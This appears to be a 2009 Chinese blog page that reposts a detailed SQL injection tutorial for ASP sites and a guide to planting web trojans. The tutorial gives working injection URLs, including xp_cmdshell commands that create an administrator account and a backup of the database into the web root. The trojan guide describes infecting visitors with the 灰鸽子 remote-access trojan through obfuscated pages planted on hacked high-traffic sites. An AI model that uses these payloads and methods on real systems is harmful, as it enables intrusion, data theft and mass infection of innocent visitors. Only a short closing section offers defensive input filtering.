　　这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个 nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。
　　顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎肯定可以拿到主机的 Administrator了。上面的方法可以很方便的测试出是否是用sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。
　　如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServer和区别入手，Access和 SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。
　　在确认可以注入的情况下，使用下面的语句：
http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)>0
http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)>0
　　如果数据库是SQLServer，那么第一个网址的页面与原页面http://www.mytest.com/showdetail.asp?id= 49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。
　　如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。
在入门篇，我们学会了SQL注入的判断方法，但真正要拿到网站的保密内容，是远远不够的。接下来，我们就继续学习如何从数据库中获取想要获得的内容，首先，我们先看看SQL注入的一般步骤：
　　第一节、SQL注入的一般步骤
　　首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。
　　其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：
　　(A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
　　注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]
　　(B) Class=连续剧这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
　　注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
　　? 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
　　注入的参数为keyword=’ and [查询条件] and ‘%25’=’，即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
　　接着，将查询条件替换成SQL语句，猜解表名，例如：
ID=49 And (Select Count(*) from Admin)>=0
　　如果页面就与ID=49的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。
　　表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。
　　有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说得很对，这世界根本就不存在100%成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。
　　有点跑题了，话说回来，对于SQLServer的库，还是有办法让程序告诉我们表名及字段名的，我们在高级篇中会做介绍。
　　最后，在表名和列名猜解成功后，再使用SQL语句，得出字段的值，下面介绍一种最常用的方法－Ascii逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。
　　我们举个例子，已知表Admin中存在username字段，首先，我们取第一条记录，测试长度：
http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0
　　先说明原理：如果top 1的username长度大于0，则条件成立；接着就是>1、>2、>3这样测试下去，一直到条件不成立为止，比如>7成立，>8不成立，就是len(username)=8
　　当然没人会笨得从0,1,2,3一个个测试，怎么样才比较快就看各自发挥了。在得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码，比如：
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0
　　同样也是用逐步缩小范围的方法得到第1位字符的ASCII码，注意的是英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。
　　第二节、SQL注入常用函数
　　有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平，特别是一些常用的函数及命令。
Access：asc(字符) SQLServer：unicode(字符)
　　作用：返回某字符的ASCII码
Access：chr(数字) SQLServer：nchar(数字)
　　作用：与asc相反，根据ASCII码返回字符
Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
　　作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串
Access：abc(数字) SQLServer：abc (数字)
　　作用：返回数字的绝对值（在猜解汉字的时候会用到）
Access：A between B And C SQLServer：A between B And C
　　作用：判断A是否界于B与C之间
　　第三节、中文处理方法
　　在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解，“中文恐惧症”很快可以克服。
　　先说一点常识：
　　Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。
　　SQL Server中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。
　　了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外，方法是没什么两样的

小竹的SQL 注入天书 - ASP 注入漏洞全接触

475562898@qq.com(人累了心碎了) — Sat, 14 Nov 2009 09:02:15 GMT

小竹的SQL 注入天书呵呵```就不用我介绍了，

SQL 注入天书 - ASP 注入漏洞全接触
作者：小竹

引言
随着B/S 模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个
行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时
候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据
库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即
ＳＱＬ注入。
ＳＱＬ注入是从正常的WWW端口访问，而且表面看起来跟一般的Web 页面访问没什么区别，
所以目前市面的防火墙都不会对ＳＱＬ注入发出警报，如果管理员没查看IIS 日志的习惯，可能被
入侵很长时间都不会发觉。
但是，ＳＱＬ注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况
进行分析，构造巧妙的SQL 语句，从而成功获取想要的数据，是高手与"菜鸟"的根本区别。
根据国情，国内的网站用ASP+Access 或SQLServer 的占70%以上，PHP+MySQ 占L20%，其
他的不足10%。在本文，我们从分入门、进阶至高级讲解一下ASP 注入的方法及技巧，PHP 注
入的文章由NB 联盟的另一位朋友zwell 撰写，希望对安全工作者和程序员都有用处。了解 ASP
注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了
吗？Let's Go...
入门篇
如果你以前没试过ＳＱＬ注入的话，那么第一步先把IE 菜单=>工具=>Internet 选项=>高级=>显示
友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE 都只显示为HTTP 500
服务器错误，不能获得更多的提示信息。
第一节、ＳＱＬ注入原理
以下我们从一个网站www.mytest.com 开始（注：本文发表前已征得该站站长同意，大部分都是
真实数据）。
在网站首页上，有名为"IE 不能打开新窗口的多种解决方法"的链接，地址为：
http://www.mytest.com/showdetail.asp?id=49，我们在这个地址后面加上单引号'，服务器会返回
下面的错误提示：
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误在查询表达式 'ID=49'' 中。
/showdetail.asp，行8
从这个错误提示我们能看出下面几点：
1. 网站使用的是Access 数据库，通过JET 引擎连接数据库，而不是通过ODBC。
2. 程序没有判断客户端提交的数据是否符合程序要求。
3. 该SQL 语句所查询的表中有一名为ID 的字段。
从上面的例子我们可以知道，ＳＱＬ注入的原理，就是从客户端提交特殊的代码，从而收集程序
及服务器的信息，从而获取你想到得到的资料。
第二节、判断能否进行ＳＱＬ注入
看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？
其实，这并不是最好的方法，为什么呢？
首先，不一定每台服务器的IIS 都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语
句的话，ＳＱＬ注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上
出错。请和系统管理员联络。
其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不
为少数，如果你用单引号测试，是测不到注入点的
那么，什么样的测试方法才是比较准确呢？答案如下：
http://www.mytest.com/showdetail.asp?id=49 ①
http://www.mytest.com/showdetail.asp?id=49 ;and 1=1 ②
③ http://www.mytest.com/showdetail.asp?id=49 ;and 1=2
这就是经典的1=1、1=2 测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：
可以注入的表现：
① 正常显示（这是必然的，不然就是程序有错误了）
② 正常显示，内容基本与①相同
③ 提示BOF 或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof 时）、或显示
内容为空（程序加了on error resume next）
不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提
示类型转换时出错。
当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型
参数，我将在中级篇的"ＳＱＬ注入一般步骤"再做分析。
第三节、判断数据库类型及注入方法
不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类
型。一般ASP 最常搭配的数据库是Access 和SQLServer，网上超过99%的网站都是其中之一。
怎么让程序告诉你它使用的什么数据库呢？来看看：
SQLServer 有一些系统变量，如果服务器IIS 提示没关闭，并且SQLServer 返回错误提示的话，
那可以直接从出错信息获取，方法如下：
http://www.mytest.com/showdetail.asp?id=49 ;and user>0
这句语句很简单，但却包含了SQLServer 特有注入方法的精髓，我自己也是在一次无意的测试中
发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在
and user>0，我们知道，user 是SQLServer 的一个内置变量，它的值是当前连接的用户名，类型
为nvarchar。拿一个 nvarchar 的值跟int 的数0 比较，系统会先试图将nvarchar 的值转成int
型，当然，转的过程中肯定会出错，SQLServer 的出错提示是：将nvarchar 值 "abc" 转换数据类
型为 int 的列时发生语法错误，呵呵，abc 正是变量user 的值，这样，不废吹灰之力就拿到了数
据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。
顺便说几句，众所周知，SQLServer 的用户sa 是个等同Adminstrators 权限的角色，拿到了sa
权限，几乎肯定可以拿到主机的 Administrator 了。上面的方法可以很方便的测试出是否是用sa
登录，要注意的是：如果是sa 登录，提示是将"dbo"转换成int 的列发生错误，而不是"sa"。
如果服务器IIS 不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access 和
SQLServer 和区别入手，Access 和 SQLServer 都有自己的系统表，比如存放数据库中所有对象
的表，Access 是在系统表[msysobjects]中，但在Web 环境下读该表会提示"没有权限"，
SQLServer 是在表[sysobjects]中，在Web 环境下可正常读取。
在确认可以注入的情况下，使用下面的语句：
http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)>0
http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)>0
如果数据库是SQLServer，那么第一个网址的页面与原页面
http://www.mytest.com/showdetail.asp?id= 49 是大致相同的；而第二个网址，由于找不到表
msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。
如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个
网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不
同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS
错误提示时的验证。
进阶篇
在入门篇，我们学会了ＳＱＬ注入的判断方法，但真正要拿到网站的保密内容，是远远不够的。
接下来，我们就继续学习如何从数据库中获取想要获得的内容，首先，我们先看看ＳＱＬ注入的
一般步骤：
第一节、ＳＱＬ注入的一般步骤
首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。
其次，根据注入参数类型，在脑海中重构SQL 语句的原貌，按参数类型主要分为下面三种：
(A) ID=49 这类注入的参数是数字型，SQL 语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧这类注入的参数是字符型，SQL 语句原貌大致概如下：
Select * from 表名 where 字段='连续剧'
注入的参数为Class=连续剧' and [查询条件] and ‘'=' ，即是生成语句：
Select * from 表名 where 字段='连续剧' and [查询条件] and ‘'=''
© 搜索时没过滤参数的，如keyword=关键字，SQL 语句原貌大致如下：
Select * from 表名 where 字段like '%关键字%'
注入的参数为keyword=' and [查询条件] and ‘%25'='，即是生成语句：
Select * from 表名 where 字段like '%' and [查询条件] and ‘%'='%'
接着，将查询条件替换成SQL 语句，猜解表名，例如：
ID=49 And (Select Count(*) from Admin)>=0
如果页面就与ID=49 的相同，说明附加条件成立，即表Admin 存在，反之，即不存在（请牢记这
种方法）。如此循环，直至猜到表名为止。
表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。
有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说
得很对，这世界根本就不存在100%成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的
黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。
有点跑题了，话说回来，对于SQLServer 的库，还是有办法让程序告诉我们表名及字段名的，我
们在高级篇中会做介绍。
最后，在表名和列名猜解成功后，再使用SQL 语句，得出字段的值，下面介绍一种最常用的方法
－Ascii 逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。
我们举个例子，已知表Admin 中存在username 字段，首先，我们取第一条记录，测试长度：
http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0
先说明原理：如果top 1 的username 长度大于0，则条件成立；接着就是>1、>2、>3 这样测试
下去，一直到条件不成立为止，比如>7 成立，>8 不成立，就是len(username)=8
当然没人会笨得从0,1,2,3 一个个测试，怎么样才比较快就看各自发挥了。在得到username
的长度后，用mid(username,N,1)截取第N 位字符，再asc(mid(username,N,1))得到ASCII 码，
比如：
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0
同样也是用逐步缩小范围的方法得到第1 位字符的ASCII 码，注意的是英文和数字的ASCII 码在
1-128 之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。
第二节、ＳＱＬ注入常用函数
有SQL 语言基础的人，在ＳＱＬ注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自
己的SQL 水平，特别是一些常用的函数及命令。
Access：asc(字符) SQLServer：unicode(字符)
作用：返回某字符的ASCII 码
Access：chr(数字) SQLServer：nchar(数字)
作用：与asc 相反，根据ASCII 码返回字符
Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
作用：返回字符串从N 个字符起长度为L 的子字符串，即N 到N+L 之间的字符串
Access：abc(数字) SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）
Access：A between B And C SQLServer：A between B And C
作用：判断A 是否界于B 与C 之间
第三节、中文处理方法
在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的
编码有所了解，"中文恐惧症"很快可以克服。
先说一点常识：
Access 中，中文的ASCII 码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。
SQLServer 中，中文的ASCII 为正数，但由于是UNICODE 的双位编码，不能用函数ascii()取得
ASCII 码，必须用函数unicode ()返回unicode 值，再用nchar 函数取得对应的中文字符。
了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜
解范围大一点外，方法是没什么两样的。
高级篇
看完入门篇和进阶篇后，稍加练习，破解一般的网站是没问题了。但如果碰到表名列名猜不到，
或程序作者过滤了一些特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？请大家接着往
下看高级篇。
第一节、利用系统表注入SQLServer 数据库
SQLServer 是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大
的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子：
http://Site/url.asp?id=1; ① exec master..xp_cmdshell "net user name password /add"--
分号;在SQLServer 中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句在
SQLServer 中将被分成两句执行，先是Select 出ID=1 的记录，然后执行存储过程
xp_cmdshell，这个存储过程用于调用系统命令，于是，用net 命令新建了用户名为name、密码
为password 的windows 的帐号，接着：
http://Site/url.asp?id=1;exe ② c master..xp_cmdshell "net localgroup name administrators /add"--
将新建的帐号name 加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种
方法只适用于用sa 连接数据库的情况，否则，是没有权限调用xp_cmdshell 的。
http://Site/url.asp?id=1 ;and db_name()>0 ③
前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回
的是连接的数据库名。
http://Site/url.asp?id=1;backup database ④ 数据库名 to disk='c:\inetpub\wwwroot\1.db';--
这是相当狠的一招，从③拿到的数据库名，加上某些IIS 出错暴露出的绝对路径，将数据库备份到
Web 目录下面，再用HTTP 把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一
览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\\202.96.xx.xx\Share
\1.db），但成功率不高。
htt ⑤ p://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype='U' and
status>0)>0
前面说过，sysobjects 是SQLServer 的系统表，存储着所有的表名、视图、约束及其它对象，
xtype='U' and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0 比较大小，
让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明的读者思考吧。
http://Site/ ⑥ url.asp?id=1 ;and (Select Top 1 col_name(object_id(‘表名'),1) from sysobjects)>0
从⑤拿到表名后，用object_id(‘表名')获取表名对应的内部ID，col_name(表名ID,1)代表该表的第
1 个字段名，将1 换成2,3,4...就可以逐个获取所猜解表里面的字段名。
以上6 点是我研究SQLServer 注入半年多以来的心血结晶，可以看出，对SQLServer 的了
解程度，直接影响着成功率及猜解速度。在我研究SQLServer 注入之后，我在开发方面的水平也
得到很大的提高，呵呵，也许安全与开发本来就是相辅相成的吧。
第二节、绕过程序限制继续注入
在入门篇提到，有很多人喜欢用'号测试注入漏洞，所以也有很多人用过滤'号的方法来"防止"注入
漏洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉的人，还是可以利用相关的函
数，达到绕过程序限制的目的。
在"ＳＱＬ注入的一般步骤"一节中，我所用的语句，都是经过我优化，让其不包含有单引号的；在
"利用系统表注入SQLServer 数据库"中，有些语句包含有'号，我们举个例子来看看怎么改造这些
语句：
简单的如where xtype='U'，字符U 对应的ASCII 码是85，所以可以用where xtype=char(85)代
替；如果字符是中文的，比如where name='用户'，可以用where
name=nchar(29992)+nchar(25143)代替。
第三节、经验小结
1.有些人会过滤Select、Update、Delete 这些关键字，但偏偏忘记区分大小写，所以大家可以用
selecT 这样尝试一下。
2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入
框取相同的名字。
3.特别注意：地址栏的+号传入程序后解释为空格，%2B 解释为+号，%25 解释为%号，具体可以
参考URLEncode 的相关介绍。
4.用Get 方法注入时，IIS 会记录你所有的提交字符串，对Post 方法做则不记录，所以能用Post
的网址尽量不用Get。
5. 猜解Access 时只能用Ascii 逐字解码法，SQLServer 也可以用这种方法，只需要两者之间的区
别即可，但是如果能用SQLServer 的报错信息把值暴露出来，那效率和准确率会有极大的提高。
防范方法
ＳＱＬ注入漏洞可谓是"千里之堤，溃于蚁穴"，这种漏洞在网上极为普遍，通常是由于程序员对注
入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里，我给大家一个函数，代
替ASP 中的Request 函数，可以对一切的SQL 注入Say NO，函数如下：
Function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符型
'ParaType:参数类型-数字型(1 表示以上参数是数字，0 表示以上参数为字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型！"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
文章到这里就结束了，不管你是安全人员、技术爱好者还是程序员，我都希望本文能对你有所帮
助。

转载自安防快线：挂马抓鸡+入侵网站后台挂马

475562898@qq.com(人累了心碎了) — Sat, 14 Nov 2009 08:30:50 GMT

备工具：
1. 黑防智能组合免杀网马2009 生成器
2. 远程控制（如灰鸽子）
3. 空间或自己做网站
步骤：
1. 配置木马
灰鸽子配置实在太简单了，为了节约时间我在这里就不写了。
2. 生成网马
网马生成步骤：打开“黑防智能组合免杀网马2009 生成器”→在“下载地址处”输入你的网马地址，比如 syhj.3322.org/muma.exe → 点击生成 → OK 网马生成成功！！！
3. 挂马
自己用IIS做个网站主机头可以是动态域名（花生壳或者3322.net）
也可以自己去5944.net 申请一个美国空间。把刚才生成的木马和网马一起放上去。之后你可以发送你的网站让别人点击。点击了之后你就可以看看你的灰鸽子有没有主机上线了吧。
如果你NB 的话。你可以去拿访问量比较大的站，这样你才能抓到更多的肉鸡，以下的我的个人拿站的方法：
在百度或者google里面搜关键字inurl:adminlogin.asp(ASP.NET做的网站后台)
inurl:adminlogin.aspx （.net程序做的后台）找出一些网站的后台登陆的网站
然后试图破解。比如默认口令admin 、system 等等。如果试不出来那么直接用工具扫描。看这个网站是否有注入漏洞，或者其他漏洞。等拿下站来了之后。直接在别人在网站上挂就得了。因为别人的网站访问量高。而且是正规网站。自然有人送上门来！这个也就是什么有很多新闻说某某著名网站被人挂马的理由啦。。哈哈、
以下是小弟，无意中拿到的站。
示范怎么挂马吧、（呵呵。我不会对这个网站做任何的破坏的。政府网站惹不起呢、呵呵）

在该网站后台添加一段如下代码

记住 SRC=后面就跟你的木马地址。只要人家访问到这个页面，而且他的机器有漏洞，那么他就成为你的肉鸡！！
以下是在网上找的十种挂马方法贴出来和大家分享：
一:框架挂马

二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js，
则JS挂马代码为

三:js变形加密

muma.txt可改成任意后缀
四:body挂马
地址';">
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '
src="'">[url]http://www.upx.com.cn/muma.htm/[/url]">';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马

八:图片伪装

九:伪装调用：

marginwidth="0"margingheight="0">
marginwidth="0"margingheight="0">

十:高级欺骗
http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)"
> 页面要显示的内容

人累了心碎了

【置订】我的心随天气,画上冻结的记号.不要让它沉下去

【置订】我的心随天气,画上冻结的记号.不要让它沉下去

网络成功人士语录，你看了没？

[转]华夏黑客联盟成立二周年大型免费培训教程

[转]华夏黑客联盟成立二周年大型免费培训教程

[转]你知道8023是什么意思吗？

[转]你忙吧！不打扰你了！ 有多少人知道这句话的意思？？

主题：SQL注入漏洞原理分析

小竹的SQL 注入天书 - ASP 注入漏洞全接触

转载自安防快线：挂马抓鸡+入侵网站后台挂马

[转]你忙吧！不打扰你了！有多少人知道这句话的意思？？